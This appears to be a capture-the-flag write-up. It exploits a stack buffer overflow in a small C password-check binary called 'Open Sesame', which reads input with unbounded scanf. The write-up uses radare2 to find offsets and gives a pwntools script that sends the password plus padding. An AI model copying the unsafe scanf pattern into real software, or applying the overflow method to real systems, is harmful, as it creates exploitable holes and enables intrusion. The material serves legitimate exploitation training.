Open Sesame
#define SECRET_PASS "OpenSesame!!!"
Bool isPasswordCorrect(char *input)
{
return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}
void caveOfGold()
{
Bool caveCanOpen = no;
char inputPass[256];
puts("BEHOLD THE CAVE OF GOLD\n");
puts("What is the magic enchantment that opens the mouth of the cave?");
flushBuffers();
scanf("%s", inputPass);
# The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian little
nx true
relocs true
relro partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error
dc
BEHOLD THE CAVE OF GOLD
What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)
# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08 0x41684241 0x42416942 0x6b42416a 0x416c4241 ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)
# Let's make our exploit script#!/usr/bin/env python3
# print("OpenSesame!!!" + "A"*259 + "B"*8)
from pwn import *
payload = b"OpenSesame!!!"
payload += b"A"*259
payload += b"B"*8
p = process("./open_sesame")
p.clean()
p.sendline(payload)
log.info(p.clean())python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)
# You can make a flag file to test thisLast updated